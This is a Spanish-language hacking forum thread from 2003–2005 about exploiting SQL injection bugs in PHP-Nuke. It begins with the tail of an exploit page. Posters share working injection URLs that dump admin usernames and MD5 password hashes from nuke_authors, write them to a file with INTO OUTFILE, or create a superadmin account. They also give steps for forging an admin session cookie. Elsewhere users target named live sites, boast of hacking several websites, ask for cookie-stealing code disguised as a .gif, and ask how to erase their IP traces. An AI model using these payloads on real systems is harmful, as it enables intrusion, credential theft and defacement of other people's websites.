      <td><div align="center"><font size="1" face="Tahoma"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
      </tr>
      </table>';

 }
       
 echo'<center><p><a href="mailto:blade@abez.org"><u><strong><font color="#CC0000" size="1" face="Tahoma">Original Exploit Code By Blade.</font></strong></u></a><br><font color="#003366" size="1" face="Verdana"><b>Version 2.2.</b></font></p></center>
      </div>
      </body>
      </html>';
?>

Venga un saludo  :D


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Dark_Hellfirez en 22 Octubre 2003, 13:52 pm
password md5?????????????? de donde saco eso??????  (sorry apenas me inicio en esta cosa :P)
 lo unico que se de eso es que sale un apartado de eso en el cain porfavor expliquenme :P

salu2 (todavia en cyber 30$ diarios ) :-X


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Dark_Hellfirez en 22 Octubre 2003, 13:58 pm
sorry ia se q es :P pero tendre q esperarme a no estar en un pto cyber :P

salu2


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: SCYUK en 26 Octubre 2003, 13:19 pm
ya hay un mensaje sobre esto, pero
(como se usa?????) --- = kasi mejor no saberlo, = kaigo n la tentacion...

bueno, salu2


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: na8us en 29 Octubre 2003, 13:13 pm
Lo que la mayoria de los que han leido este post sobre el exploit para el bug de inyeccion SQL es como se puede hacer para sacar el pass MD5, ya que sin el no se puede hacer nada!!!!, creo que seria muy beneficioso para todos digas almenos como podriamos sacarlo o darnos una ayuda, yo por ejemplo utilice el metodo que lei en una pagina http://cyruxnet.com.ar el cual era el siguiente:
www.webconelbug.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt

esto para crear un archivo pwd.txt en el cual se encuentra el pass MD5, el problema de esto radica en que se necesita conocer (eso creo) un path que sea de acceso publico en el cual se pueda crear dicho archivo de texto.
Para poder tener acceso a dicho archivo solo seria necesario ir a:
www.webconelbug.com/path_to_file/pwd.txt

pero aun no me ha dado resultado :-\ no se si alguno de ustedes me podran ayudar con el ultimo empujonsito que me falta


Título: Aclaraciones:
Publicado por: Blade en 30 Octubre 2003, 15:35 pm
Aclaremos:

/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...

Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Y sobre el PHP-Nuke y el  modulo Downloads:

Con esto muestra los administradores y sus passwords codificados...:
/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20....

Todo codigo que ejecuta la Inyeccion SQL puede ser modificado levemente para conseguir el objetivo deseado...
El exploit facilita el proceso, evitando que el usuario tenga que completar varias partes del proceso completo...

Salu2...

PD: Usar con moderacion y todo eso...


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: elvizo en 31 Octubre 2003, 03:30 am
con q se puede descifrar md5? john lo hace?
o cain? o es necesario algun otro


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Blade en 31 Octubre 2003, 12:05 pm
Con: NADA... Unicamente 'Crackear'...


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Kriptosys en 31 Octubre 2003, 14:42 pm
MD5 no se puede descifrar..... pero como dice Blade se puede crackear.
 que no es mas que una Comparacion de Caracteres, es decir Toma un Caracter lo cifra y lo compara con el del Texto cifrado... y asi hasta que de con los caracteres correctos.

FiH nº 3 En camino!!!


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: elvizo en 1 Noviembre 2003, 03:02 am
bueno y q aplicacion se encarga de hacer dicah operacion? john lo hace? no se si oi algo o me estoy confundiendo


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: na8us en 12 Noviembre 2003, 16:32 pm
Aca solo hemos visto la manera de explotar el bug me gustaria saber cual es la manera de solucionar el problema  :-\

Salu2


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: elvizo en 13 Noviembre 2003, 09:47 am
md5 se crackea con cain


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: JaNi en 26 Diciembre 2003, 15:35 pm
Citar
/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...


Eso no funciona en la mayoría de servidores :P
como hacer para sacar el password en md5 de otra forma?


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 10 Febrero 2004, 03:50 am
Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com (http://juan_lux@hotmail.com)


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 16 Febrero 2004, 09:20 am
Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: CamelSmoke en 20 Febrero 2004, 19:28 pm
En realidad el Password MD5 no se saca de ninguna de esas maneras...bah, tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al menos aun no encontre la forma de verlo ni cifrado ni nada, lo cual me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: p47ch en 4 Marzo 2004, 23:54 pm
Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina?

Pues algunas no  lo dicen !

Gracias ! :P



Ademas me sale lo sig:

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


y


Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


Cuando pongo

http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Por q ?


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 5 Marzo 2004, 01:57 am
Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: CELL en 22 Marzo 2004, 21:46 pm
No faltan los lammers http://hack.csxv.net >:(

Fijense en "WEB HACKEADAS"  :-\ y dense una vuelta por el foro las risas estan garantizadas por ejemplo en estos post

http://hack.csxv.net/modules.php?name=Forums&file=viewtopic&t=36


http://hack.csxv.net/modules.php?name=Forums&file=viewtopic&t=117


 :o



Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 28 Marzo 2004, 14:35 pm
 >:( >:( Se jodio se jodio... que ya no vale este exploit para el php-nuke de la nueva version... ya que viene con sus protecciones


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: X en 31 Marzo 2004, 20:27 pm
No ma, necesitamos nuevas cosas para nuke, sacan muy pronto los patches para los bugs y exploits.

A ver si alguien le hecha también una chekada a esto, una pagina sin patches toda sin tecnología hecha en el 2002 sin ninguna actualización y no la puedo tomar ni meterme como admin, he tratado todos los exploits y sqlinjection del mundo y no he podido, es fusión de phpbb y php nuke pero lo que no entiendo es como diablos tiene seguridad si esta en phpnuke 5.5 y phpbb2.0.4 es imposible uqe no la haya podido tomar he tratado 4 meses, ninguna page se me ha resistido tanto, a ver si alguién me ayuda con esto www.animexico.net es la page, hagan la prueba y veran que se frustraran jajaj si necesito ayuda aca un nuevo exploit a lo mejor sirve.


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: oRTNZ en 31 Marzo 2004, 22:37 pm
esta parchado, busca otro bug,suerte


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 12 Mayo 2004, 05:20 am
Wenas...

Ya nadie actuliza esto?? porque yo tengo una dudita.. el día 10 uno usuarios (por llamarlos asi) me se infiltraron en mi web de php-nuke 7.2 borrandome y cambiandome varias cosas del web ( y ellos me dejaron un mensaje diciendo que la habian hackeado... y que yo era un lammer)(la verdad no se quien es mas lammer si ellos o yo), ahora la he tenido que borrar de nuevo y volverla a subir... esto ya no me va a volver a pasar.. porque,ya que e puesto logers y algunas cosillas para que me de total información de quien entra o sale de la pagina solo digo que la proxima vez que ocurra ya no borrare la pagina si no que denunciare a los usuarios maldiciosos llevando a la guardia civil todos los corresponidientes documentos que piden para una denuncia requeridad por la legislación española.

Ahora esta es mi duda... que bug puede tener el php-nuke7.2, si estan con los correspondientes parches??? ha salido algun bug nuevo?

Saludos.

P.D.: Los usuarios maldiciosos que borraron y/o jodieron mi web me dejaron http://www.elhacker.net y "emulanetwork" de referencia, asique supongo que serán usuarios registrados aquí.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: oRTNZ en 12 Mayo 2004, 05:56 am
Si la hay es esta
http://foro.elhacker.net/index.php/topic,31009.0
man no se si en este foro se dedican a este tipo de cosas o NO,solo se que cualquiera puede haber hecho eso....
si hubieran dejado de referencia www.microsoft.com y de alias bill-gates tambien comentarias esooo,supongo que NO...,saludos


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Nuker en 10 Junio 2004, 16:38 pm
para cifrar un password en MD5:

http://www.elhacker.net/encriptador.htm

Para crackearlo con el cain

bueno si ya lo sabian no puteen  ;D


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: satan_31337_hack en 9 Julio 2004, 13:50 pm
ME A FUNCIONADO DE MARAVILLA EL EXPLOIT YA E HACKIADO VARIAS WEBS!!!!!! GRACIAS A TODOOOOOS!!!!!!!!!!!  8)


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: CEROX en 12 Julio 2004, 11:16 am
alguien tan hamable me puede decir como se si la pagina es vurnerable o es php nuke gracias!!!


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: viruss1362 en 12 Julio 2004, 14:03 pm
joder CEROX eso es facil, php nuke se caracteriza por muchas cosas si eso hazte una web en php nuke y veras lo k tiene en especial  :P enga machote k tu puedes xDD


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: [Ky3zZ] en 27 Julio 2004, 08:00 am
A ver..  señores..  como lo puedo explicar de alguna manera.. para que no dañe la sensivilidad de los demas usuarios.. ??? ???

Quiero quedar unas cosas claras ok?  >:(

1º No me agregen al Messenger... porque les borrare...

2º Si me agregan al Messenger y lo primero que me dicen es... sabes hackar una pagina php-nuke?.. tambien los borrare...

3º Yo no soy ningun maestro de php-nuke ni de hacking o sea que no enseño a nadie.. por lo cual los que me agregen al Messenger y me digan que les enseñe... les borrare...

4º Esto es un Foro para compartir opiniones, para dibulgar lo que a uno le apetezca o lo que el foro permitar.. por lo cual los usuarios que no tengan ni idea.. que no digan que les enseñemos.. por favor.. aprender un pokito buscando en el foro o en otro sitios, que viene muy bien explicado... asi aprendimos los demas...

5º A todo esto.... Gracias por leer este comunicado.

Saludos


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: ins@no en 27 Julio 2004, 15:34 pm
hola e aprendido algo pero tengo una pregunta ¿cuando uno se mete a hackear una pagina php la ip de uno keda archivado en el db? se puede borrar o es mentira ??? ??? ???


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: WiNSoCk en 30 Julio 2004, 05:50 am
Podria quedar archivado en la base de datos sí, pero normalmente por si solo el nuke, aun que esta programado para ello, no lo hace.

Sí, queda registrado en los archivos de la empresa de host, y el 90% no tiene ni p**a idea de como mirarlo (digo los admins eh? asike ya imagina los users)

Existe ya, programas para detectarte, los ataques...los cuales no sé como funcionan, no les he probado (no me aburro tanto).

Y respondiendo más concretamente a tu pregunta, si quedase en bd....Sí...existen formas de borrarlo...tal como haces una buskeda, puedes borrar...solo es saber...

Pero esto es como en mates, si 2 + 2 es 4, pero te cambian un jodido 2 por una letra...la has cagado...busca que koño es esa letra, osease que si te guardan los datos en un bd, aparte...la has cagado.

P.D: Odio las matematicas.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: ins@no en 30 Julio 2004, 06:46 am
 ;D bueno gracias.. pero como se puede borrar la db para sacar mis datos  :o


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: WiNSoCk en 30 Julio 2004, 21:13 pm
No lo sé...nunca me he puesto ha aprender php, bueno, exactamente esto trata del sql, y tampoco me he puesto, pero supongo que si miras la linea con la que atacas a la bd, seria algo asi: (Todo lo que viene acontinuación es inventado)

Search (o querry) tabla: nuke_authors mostrar all.

Si sabes algo de sql, fijate que algo tiene que estar haciendo la llamada para mostrar los datos de nuke_authors, o como se ponga, ahora solo deberias mirar para borrar, delete, del, rm, etc...


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: khera en 7 Septiembre 2004, 06:08 am
Buenas a todos, antes que nada deciros que es la primera vez que posteo por aqui, pero no la primera vez que leo los posts. Cada vez que leo algun post me quedo alucinado con la de cosas que sabeis XD a ver si estudiando un dia yo tambien puedo saber tanto como algunos de por aqui...
(Ya se que han parcheado las nuevas versiones de PHP-Nuke pero yo os hablo de Post Nuke... y tiene pocos parches la url de la que hablo xD)
Bueno ahi va... A ver yo consegui la password md5 de un admin de una web a traves de un exploit publicado en waraxe. El problema es que la web no esta basada en PHP si no en Post Nuke (que tampoco es un problema) Ahora mismo ya llevo 2 dias intentando crackear la password con el Mdcrack pero tarda muchisimo, ya voy por 8 caracteres y no encuenta nada :_( ...tambien envie el hash a passcracking para ver si ellos lo consiguen antes que yo. Bueno el tema es que si este bug de inyeccion para PHP Nuke tambien sirve para Post Nuke... ya se que el topic dice... PHP Nuke con mayusculas y todo, pero cabe alguna posibilidad de que funcione con Post Nuke?! Gracias por adelantado ^^
PD: Ya que estamos, a veces el Mdcrack me da un error cuando lleva mucho rato tabajando, y es que cuando hago ^C para pausarlo, cuando me dice la Average de hashes por segundo, a veces el numero que muestra es negativo... es eso normal?


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Ambolius en 22 Septiembre 2004, 12:45 pm
Los bugs en portales predefinidos, asi como en sus diferentes modulos se suelen basar en codigo que no comprueba errores; normalmente variables que no filtran caracteres especiales. Este codigo es diferente los distintos tipos de portales. Por lo que los bugs pueden ser muy parecidos, pero no iguales.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Davidu en 28 Septiembre 2004, 07:41 am
admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox |

esto crea usuario un4m3 pass 123456 y te crea una cuenta god

modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* |
este te dise el admin y el pass md5, pa entrar como admin te registras un user, te bajas el mozilla entras con el mozilla y le das a k entre automaticamente asin te crea un cookie cojes el cookie i cambias tu hash base64 por el base64 del admin k es nombreadmin:hasmd5 lo codificas a base 64 y lo cambias por el k tienes tu en tus cookies, i al vereis k pone user_id lo cambiais por admin i a la k entrais a la web tais en la cuenta del admin


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: tokugawa en 2 Octubre 2004, 09:38 am
Las passwords cifradas en el nuke se encriptan con md5, a su vez este algoritmo de cifrado es de una sola via, es decir cifra, pero no decifra, para cifrar se utiliza una semilla, que se extrae de la misma password, esto lo hace practicamente indecifrable ya que para poder decifrarlo se necesita saber el password y sis sabes el password, para que decifrarlo?.

el Cain podria crackearlo, por fuerza bruta, con un diccionario de palabras.

ahora el modulo webmail del nuke(ya no lo trae incorporadp) encriptaba las password del mail, con un algoritmo hecho en php que utilizaba como semilla el nombre de usuario del mismo, este modulo tiene varios bugs y uno de los menos peligrosos, pero si utliles al momento de combinarlo con el uso de otros bugs, es que esas passwords se pueden descifrar facilemente, temniendo acceso a los correos de los usuarios del nuke que usaran el modulo webmail.

otro de los bugs que tenia, era que el archivo que permitia adjuntar archivos leia una variable contenida en la base de datos la cual le indicaba la ruta de donde estaban almacenados los archivos atachados, y manipulando variables se podia inclkuso extraer archivos sensibles, como el config.php o introducir un troyano hecho en php, que luego permitiera acceso via webftp a todo el contenido del sitio y si se keria, tambien se le podia dotar de la cualidad de acceder a la base de datos y respaldarla, o hacer cualkier otra cosa con la base de datos, ahora ya no distribuyen ese modulo con el nuke porque su codigo era demasiado inseguro.

Y por sobre lo de ser lamers o no, supongo que kien ocupa esos xploits, y se cree hacker por hacerlo sin sikiera saber porke suceden las cosas, o que hay detras de esa sentencia, supongo que lo es(no quiero herir suceptibilidades, pero es la triste realidad de muchos).

espero que con esto hayan aprendido algo, shaus


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Fosko en 6 Octubre 2004, 03:54 am
Hola. Bueno, a ver... Me he leído TODOS los mensajes de los foros sobre inyección SQL,y he probado todo lo que se dice en varias webs con versiones viejas de phpnuke, y no funciona nada. Yo tuve una web hace tiempo en phpnuke 7.3, con los últimos parches y aún así me la hackearon. Intentando comprender cómo lo hicieron vine aquí, y he intentado probar con alguna web sin intención de joderla para ver los pasos que siguieron.

He probado a poner las direcciones esas como

"admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox |"

y vamos, todo lo que se habla en este tema, pero nada. En los manuales no me entero de mucho (por no decir nada) y no logro hacer nada... Alguien podría dar algún programa o alguna directriz de cómo inyectar sql y que funcione? Os lo agradecería mucho. Por cierto, saberse la teoría es fácil, se puede decir: haz tal haz cual, pero si esa persona no lo ha probado dudo que funcione. Yo ya digo, no me funciona nada, me salen todo tipo de mensajes en las webs, páginas en blanco y un sinfin de contratiempos. Pues eso, si alguien me puede ayudar se lo agradecería muchísimo :D Saludossssss


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Morator en 10 Octubre 2004, 04:56 am
[hola como estan todos yo soy nuevo en esto de los sploit y he estado revisando paginmas de hacker pero en todas estoy igual ninguna explica como utilisarlo ni de donde bajarlos
quisiera que me ayudaran ha saber como puedo bajar un sploit  y como utilisarlo pero el mas sencillo que soy nuevo


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: GhostShadow en 11 Octubre 2004, 08:00 am
Bueno, antes que nada hay que entender en que consisten las exploits que estamos utilizando y que hacen exactamente. (Un poco de conocimiento de SQL viene bien) Si buscas en este foro y usas un poco el google, en 2 dias ya estaras modificando las exploits para que se adecuen a tus "necesidades" o al menos comprendiendo cada instruccion que ejecutan...

Tb te recomiendo para el tema del php nuke que te des una vuelta por www.waraxe.us (esta en ingles)

Si no te han funcionado las exploits o estan parcheados los sites, o las estas poniendo al "tuntun"

Citar
"admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox "

Si te fijas cada campo tiene su significado. Este exploit en concreto sirve para crearte una cuenta superadmin en la pagina en cuestion. Curiosea un poco sobre que significan los campos add_aid, add_name, add_pwd, add_email, add_radminsuper (es un poco obvio :P) y molestate en pasarle un decode64 a eCcgVU5JT04gU0VMRUNUIDEvKjox (el value de admin) y busca informacion sobre la consulta SQL que te sale y pq esta estructurada de esa manera... Si empiezas por ahi, probablemente empiezes a ver mas claras las exploits de este tipo


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: shy en 11 Octubre 2004, 13:05 pm
pues mira yo he tenido un problema similar ..

he obtenido el admin hashmd5 de una web ...

y en mi cookie parecee esto ..

Código:
lang english pagina.delmd5.com/ 1536 2019914496 29740549 1649034928 29667132 * user aki esta mi pass md5 con base 64 pagina.delmd5.com/ 1536 2765991936 29673159 220947632 29667133 *

al hacerle un decode kon base 64 aparece

9:shy:aki el hash:10::0:0:0:0::40967
ahora e intentado hacer esto

9:aki el nick del admin:hash del admin:10::0:0:0:0::40967
guarod la cookie pero kuadno ingrese otra ves tengo que volver a loguearme .. no me acepta esto .. proke .. que hago mal ???????? y que signifoca el 9 antes del nick y los :10::0:0:0:0:40967 despues ... ???? ayuda profavor



Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: IoA en 21 Octubre 2004, 10:03 am
intento hacerme de la administracion de un php-nuke pero el problema es que es 7.4 y esta con todos los parches, la pregunta es... ¿le sigo buscando? porque he intentado todo lo que esta escrito en este tipo de foros y en de los descubridores de los bugs y no logro hacer nada, se que hay formas pero son muy underground, ojala puedan darme una pista de como hacerlo pues he visto sitios en php-nuke 7.4 con todos los parches defaceados y no lo comprendo.

no busco hacer deface, mas bien quiero tener el control de la web para poder sacar iformacion nesesaria, oajala puedan ayudarme.

gracias y hasta pronto.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: byebye en 21 Octubre 2004, 15:48 pm
que este parcheado no quiere decir que no le puedan hacer un deface, es mas puede que esos defaces ni sean por culpa de la seguridad del php-nuke.... el servidor que aloja la pagina puede tener 1 o mas fallos de seguridad vete tu a saber.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: IoA en 21 Octubre 2004, 17:03 pm
gracias por la aclaracion.
he visto que se puede robar las cookies del admin con un codigo en php guardado con terminacion .gif (no se si tambien .jpg) con el que le das el link al admin y te guarda las cookies en un txt, es muy efectivo y ademas no es tan engañosa la url que le damos al admin puesto que nadie sospecha de un .gif, mi pregunta es, ¿alguien sabe cual es el codigo en php para lograr este metodo? o por lo menos que me puedan facilitar una web donde hablen al respecto.

gracias.


Título: Preguntas para el-brujo y Blade
Publicado por: Gazsux en 27 Octubre 2004, 07:23 am
Buenas chamos, miren primero va para el-brujo:
Ya esta, pusiste el codigo de fuente de la inyeccion SQL para PHP, pero chamo, como diablos "ejecuto" la accion? porque si vemos, el chamo Blade, nos puso bien claras las direcciones URL's con las que "Atacar" la website, o porlomenos intentarlo, pero tu pones ese codigo de fuente que ni p**a que hacer con el? se ve interesante la descripcioon que le das pero... ? como ejecutarlo?.


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Ambolius en 1 Noviembre 2004, 02:31 am
Ese codigo esta hecho en PHP, por lo que has de guardarlo en un archivo con esa extension. Para hacerlo funcionar debes hacer pasar la pagina.php donde has guardado el codigo por un interprete de PHP, ya sea en tu propio equipo, en un servidor web gratuito, de pago...


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Chero en 12 Enero 2005, 06:04 am
pues mira yo he tenido un problema similar ..

he obtenido el admin hashmd5 de una web ...

y en mi cookie parecee esto ..

Código:
lang english pagina.delmd5.com/ 1536 2019914496 29740549 1649034928 29667132 * user aki esta mi pass md5 con base 64 pagina.delmd5.com/ 1536 2765991936 29673159 220947632 29667133 *

al hacerle un decode kon base 64 aparece

9:shy:aki el hash:10::0:0:0:0::40967
ahora e intentado hacer esto

9:aki el nick del admin:hash del admin:10::0:0:0:0::40967
guarod la cookie pero kuadno ingrese otra ves tengo que volver a loguearme .. no me acepta esto .. proke .. que hago mal ???????? y que signifoca el 9 antes del nick y los :10::0:0:0:0:40967 despues ... ???? ayuda profavor

Tengo exactamente el mismo problerma...
Alguien sabe lo q pasa?????
X favor, responder este mensaje!!!!
Gracias


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: juv3ntin0 en 17 Enero 2005, 13:18 pm
como hago para saber el password del admin, porque soy medio ignorante :-\, si alguien me podria decir bien mi duda se lo agradeceria


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: ismHAck-_- en 23 Marzo 2005, 08:18 am
salu2 ..
me funciono muy bien el exploit.
hay alguna forma de eliminar la ip de la db?
.. :-\


Título: Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Lot3k en 20 Abril 2005, 05:37 am
Mira ismhack lo  que puedes hacer y para que te evites muchisimos problemas , pues usa un proxy.